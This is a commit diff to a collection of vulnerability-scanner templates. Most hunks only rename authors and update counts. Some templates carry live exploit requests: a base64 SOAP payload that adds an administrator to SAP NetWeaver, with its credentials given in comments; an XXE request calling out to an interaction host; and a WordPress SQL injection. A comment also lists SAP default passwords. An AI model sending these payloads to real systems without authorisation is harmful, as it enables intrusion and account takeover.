commit
1f36178d37
10
README.md
10
README.md
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
|
||||
| takeovers | 67 | exposures | 105 | technologies | 98 |
|
||||
| misconfiguration | 67 | workflows | 32 | miscellaneous | 22 |
|
||||
| cves | 331 | vulnerabilities | 175 | exposed-panels | 145 |
|
||||
| takeovers | 67 | exposures | 106 | technologies | 99 |
|
||||
| misconfiguration | 67 | workflows | 32 | miscellaneous | 24 |
|
||||
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
|
||||
| fuzzing | 9 | helpers | 8 | iot | 13 |
|
||||
| fuzzing | 9 | helpers | 7 | iot | 13 |
|
||||
|
||||
**111 directories, 1208 files**.
|
||||
**112 directories, 1216 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2013-2251
|
|||
|
||||
info:
|
||||
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
||||
author: exploitation & @dwisiswant0
|
||||
author: exploitation,dwisiswant0
|
||||
severity: critical
|
||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-14849
|
|||
|
||||
info:
|
||||
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
|
||||
author: Random-Robbie
|
||||
author: Random_Robbie
|
||||
severity: high
|
||||
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
|
||||
tags: cve,cve2017,nodejs,lfi
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
id: CVE-2017-5638
|
||||
info:
|
||||
author: Random Robbie
|
||||
author: Random_Robbie
|
||||
name: Apache Struts2 RCE
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-7269
|
|||
|
||||
info:
|
||||
name: Windows Server 2003 & IIS 6.0 RCE
|
||||
author: thomas_from_offensity & @geeknik
|
||||
author: thomas_from_offensity,geeknik
|
||||
severity: critical
|
||||
description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
|
||||
reference:
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-7615
|
|||
|
||||
info:
|
||||
name: CVE-2017-7615
|
||||
author: bp0lr & dwisiswant0
|
||||
author: bp0lr,dwisiswant0
|
||||
severity: high
|
||||
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
|
||||
tags: cve,cve2017,mantisbt
|
||||
|
|
|
@ -14,7 +14,7 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
|
||||
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
|
@ -26,4 +26,4 @@ requests:
|
|||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
- "dns"
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2017-9841
|
|||
|
||||
info:
|
||||
name: CVE-2017-9841
|
||||
author: Random-Robbie
|
||||
author: Random_Robbie
|
||||
severity: high
|
||||
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
|
||||
tags: cve,cve2017,php,phpunit,rce
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-1000129
|
|||
|
||||
info:
|
||||
name: Jolokia XSS
|
||||
author: mavericknerd @0h1in9e
|
||||
author: mavericknerd,0h1in9e
|
||||
severity: high
|
||||
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
|
||||
tags: cve,cve2018,jolokia,xss
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-1000861
|
|||
|
||||
info:
|
||||
name: Jenkins 2.138 Remote Command Execution
|
||||
author: dhiyaneshDK & @pikpikcu
|
||||
author: dhiyaneshDK,pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
|
||||
tags: cve,cve2018,jenkin,rce
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-11409
|
|||
|
||||
info:
|
||||
name: Splunk Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
||||
tags: cve,cve2018,splunk
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-11759
|
|||
|
||||
info:
|
||||
name: Apache Tomcat JK Status Manager Access
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: medium
|
||||
reference: https://github.com/immunIT/CVE-2018-11759
|
||||
tags: cve,cve2018,apache
|
||||
|
|
|
@ -17,7 +17,12 @@ requests:
|
|||
words:
|
||||
- "application/x-shockwave-flash"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "javascript:alert(1337)"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2018-19439
|
|||
|
||||
info:
|
||||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: high
|
||||
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
||||
tags: cve,cve2018,oracle,xss
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-20824
|
|||
|
||||
info:
|
||||
name: Atlassian Jira WallboardServlet XSS
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
|
||||
tags: cve,cve2018,atlassian,jira,xss
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-15858
|
|||
|
||||
info:
|
||||
name: Unauthenticated Woody Ad Snippets WordPress Plugin RCE
|
||||
author: dwisiswant0 & fmunozs & patralos
|
||||
author: dwisiswant0,fmunozs,patralos
|
||||
severity: high
|
||||
description: |
|
||||
This template supports the detection part only. See references.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-17382
|
|||
|
||||
info:
|
||||
name: Zabbix Authentication Bypass
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: critical
|
||||
description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
|
||||
reference: https://www.exploit-db.com/exploits/47467
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-17558
|
||||
info:
|
||||
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
|
||||
author: pikpikcu & madrobot
|
||||
author: pikpikcu,madrobot
|
||||
severity: critical
|
||||
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-19985
|
|||
|
||||
info:
|
||||
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
|
||||
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
|
||||
author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure.
|
||||
refrense: https://www.exploit-db.com/exploits/48698
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2019-2767
|
||||
|
||||
info:
|
||||
name: Oracle Business Intelligence - Publisher XXE
|
||||
author: madrobot
|
||||
severity: high
|
||||
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
||||
- https://www.exploit-db.com/exploits/46729
|
||||
tags: cve,cve2019,oracle,xxe,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
|
@ -1,6 +1,6 @@
|
|||
id: CVE-2019-3396
|
||||
info:
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
name: Atlassian Confluence Path Traversal
|
||||
severity: high
|
||||
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-8449
|
|||
|
||||
info:
|
||||
name: JIRA Unauthenticated Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: medium
|
||||
description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
|
||||
reference: |
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-9978
|
|||
|
||||
info:
|
||||
name: WordPress social-warfare RFI
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: critical
|
||||
description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
|
||||
reference: https://github.com/mpgn/CVE-2019-9978
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-12720
|
|||
|
||||
info:
|
||||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
|
||||
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-5284
|
|||
|
||||
info:
|
||||
name: Next.js .next/ limited path traversal
|
||||
author: Harsh & Rahul & dwisiswant0
|
||||
author: rootxharsh,iamnoooob,dwisiswant0
|
||||
severity: medium
|
||||
description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
|
||||
tags: cve,cve2020,nextjs,lfi
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-5405
|
|||
|
||||
info:
|
||||
name: Spring Cloud Directory Traversal
|
||||
author: Harsh Bothra
|
||||
author: harshbothra_
|
||||
severity: high
|
||||
description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
|
||||
reference: https://pivotal.io/security/cve-2020-5405
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-5902
|
|||
|
||||
info:
|
||||
name: F5 BIG-IP TMUI RCE
|
||||
author: madrobot & dwisiswant0 & ringo
|
||||
author: madrobot,dwisiswant0,ringo
|
||||
severity: high
|
||||
description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
|
||||
reference: |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
name: SAP NetWeaver - Remote Admin addition
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2020,sap
|
||||
|
@ -11,24 +11,32 @@ info:
|
|||
- https://launchpad.support.sap.com/#/notes/2934135
|
||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||
- https://github.com/chipik/SAP_RECON
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
data: helpers/payloads/CVE-2020-6287.xml
|
||||
raw:
|
||||
- raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
|
||||
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
|
||||
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
# userName - sapRpoc6351
|
||||
# password - Secure!PwD8890
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
- "CTCWebServiceSi"
|
||||
- "SOAP-ENV"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
@ -36,4 +44,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
part: header
|
||||
- "SAP NetWeaver Application Server"
|
||||
part: header
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-8115
|
|||
|
||||
info:
|
||||
name: Revive Adserver XSS
|
||||
author: madrobot & dwisiswant0
|
||||
author: madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: |
|
||||
A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-8512
|
|||
|
||||
info:
|
||||
name: IceWarp WebMail XSS
|
||||
author: pdnuclei & dwisiswant0
|
||||
author: pdteam,dwisiswant0
|
||||
severity: medium
|
||||
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
|
||||
reference: |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-22986
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST unauthenticated RCE
|
||||
author: Harsh Jaiswal (@rootxharsh) & Rahul Maini (@iamnoooob)
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
tags: bigip,cve,cve2021,rce
|
||||
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2021-24285
|
||||
|
||||
info:
|
||||
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
|
||||
author: ShreyaPohekar
|
||||
severity: critical
|
||||
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
|
||||
tags: cve,cve2021,wordpress,wp-plugin,sqli
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
|
||||
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
||||
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Content-Length: 47
|
||||
|
||||
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
|
||||
part: body
|
|
@ -2,7 +2,7 @@ id: rabbitmq-default-admin
|
|||
|
||||
info:
|
||||
name: RabbitMQ Default Credentials
|
||||
author: fyoorer & dwisiswant0
|
||||
author: fyoorer,dwisiswant0
|
||||
severity: high
|
||||
tags: rabbitmq,default-login
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: dead-host-with-cname
|
|||
|
||||
info:
|
||||
name: dead-host-with-cname
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: dns
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: adminer-panel
|
||||
info:
|
||||
name: Adminer Login panel
|
||||
author: random-robbie & meme-lord
|
||||
author: random_robbie,meme-lord
|
||||
severity: info
|
||||
reference: https://blog.sorcery.ie/posts/adminer/
|
||||
tags: panel
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: jmx-console
|
||||
info:
|
||||
name: JMX Console
|
||||
author: Yash Anand @yashanand155
|
||||
author: yashanand155
|
||||
severity: low
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: joomla-panel
|
|||
|
||||
info:
|
||||
name: Joomla Panel
|
||||
author: github.com/its0x08
|
||||
author: its0x08
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: mobileiron-login
|
|||
|
||||
info:
|
||||
name: MobileIron Login
|
||||
author: dhiyaneshDK & @dwisiswant0
|
||||
author: dhiyaneshDK,dwisiswant0
|
||||
Severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: open-stack-dashboard-login
|
|||
|
||||
info:
|
||||
name: OpenStack Dashboard
|
||||
author: dhiyaneshDK & hackergautam
|
||||
author: dhiyaneshDK,hackergautam
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6464
|
||||
tags: panel,openstack
|
||||
|
|
|
@ -2,7 +2,7 @@ id: public-tomcat-manager
|
|||
|
||||
info:
|
||||
name: tomcat manager disclosure
|
||||
author: Ahmed Sherif & geeknik
|
||||
author: Ahmed Sherif,geeknik
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: sap-netweaver-portal-detect
|
||||
id: sap-netweaver-portal
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver Portal detect
|
||||
name: SAP NetWeaver Portal
|
||||
author: organiccrap
|
||||
severity: info
|
||||
tags: panel
|
||||
tags: panel,sap
|
||||
|
||||
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
|
||||
|
|
@ -1,36 +0,0 @@
|
|||
id: sap-recon-detect
|
||||
|
||||
info:
|
||||
name: SAP RECON Finder
|
||||
author: samueladi_ & organiccrap
|
||||
severity: medium
|
||||
tags: panel
|
||||
|
||||
# Source:- https://github.com/chipik/SAP_RECON
|
||||
# This is detection template, please use above poc to exploit this further.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
|
||||
- "{{BaseURL}}/CTCWebService/Config1?wsdl"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- Method Not Allowed
|
||||
- Expected request method POST. Found GET.
|
||||
- Generated by WSDLDefinitionsParser
|
||||
- bns0:Config1Binding
|
||||
- wsdl:definitions
|
||||
- tns:CTCWebServiceSiBinding
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 405
|
||||
- 200
|
||||
condition: or
|
|
@ -2,7 +2,7 @@ id: traefik-dashboard-detect
|
|||
|
||||
info:
|
||||
name: Traefik Dashboard
|
||||
author: schniggie & StreetOfHackerR007
|
||||
author: schniggie,StreetOfHackerR007
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: webeditors
|
|||
|
||||
info:
|
||||
name: Web Editors
|
||||
author: pwnmachine
|
||||
author: princechaddha
|
||||
severity: info
|
||||
tags: panel
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: wadl-api
|
|||
|
||||
info:
|
||||
name: wadl file disclosure
|
||||
author: 0xrudra & manuelbua
|
||||
author: 0xrudra,manuelbua
|
||||
severity: info
|
||||
tags: exposure,api
|
||||
reference: |
|
||||
|
|
|
@ -2,7 +2,7 @@ id: default-sql-dump
|
|||
|
||||
info:
|
||||
name: MySQL Dump Files
|
||||
author: geeknik & @dwisiswant0
|
||||
author: geeknik,dwisiswant0
|
||||
severity: medium
|
||||
tags: exposure,backup
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: zip-backup-files
|
|||
|
||||
info:
|
||||
name: Compressed Web File
|
||||
author: Toufik Airane & @dwisiswant0
|
||||
author: Toufik Airane,dwisiswant0
|
||||
severity: medium
|
||||
tags: exposure,backup
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: docker-compose-config
|
|||
|
||||
info:
|
||||
name: docker-compose.yml exposure
|
||||
author: meme-lord & blckraven & geeknik
|
||||
author: meme-lord,blckraven,geeknik
|
||||
severity: medium
|
||||
tags: config,exposure,devops
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: exposed-svn
|
|||
|
||||
info:
|
||||
name: Exposed SVN Directory
|
||||
author: udit_thakkur & dwisiswant0
|
||||
author: udit_thakkur,dwisiswant0
|
||||
severity: medium
|
||||
tags: config,exposure,svn
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: git-config
|
|||
|
||||
info:
|
||||
name: Git Config Disclosure
|
||||
author: pdteam & pikpikcu
|
||||
author: pdteam,pikpikcu
|
||||
severity: medium
|
||||
description: Searches for the pattern /.git/config on passed URLs.
|
||||
tags: config,git,exposure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: laravel-env
|
|||
|
||||
info:
|
||||
name: Laravel .env file accessible
|
||||
author: pxmme1337 & dwisiswant0 & geeknik & emenalf
|
||||
author: pxmme1337,dwisiswant0,geeknik,emenalf
|
||||
severity: critical
|
||||
description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
|
||||
reference: https://laravel.com/docs/master/configuration#environment-configuration
|
||||
|
|
|
@ -2,7 +2,7 @@ id: package-json
|
|||
|
||||
info:
|
||||
name: npm package.json disclosure
|
||||
author: geeknik & afaq
|
||||
author: geeknik,afaq
|
||||
severity: info
|
||||
description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
|
||||
tags: config,exposure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: phpinfo-files
|
|||
|
||||
info:
|
||||
name: phpinfo Disclosure
|
||||
author: pdteam & daffainfo & meme-lord
|
||||
author: pdteam,daffainfo,meme-lord
|
||||
severity: low
|
||||
tags: config,exposure
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: rails-database-config
|
|||
|
||||
info:
|
||||
name: Ruby-on-Rails Database Configuration Exposure
|
||||
author: pdteam & geeknik
|
||||
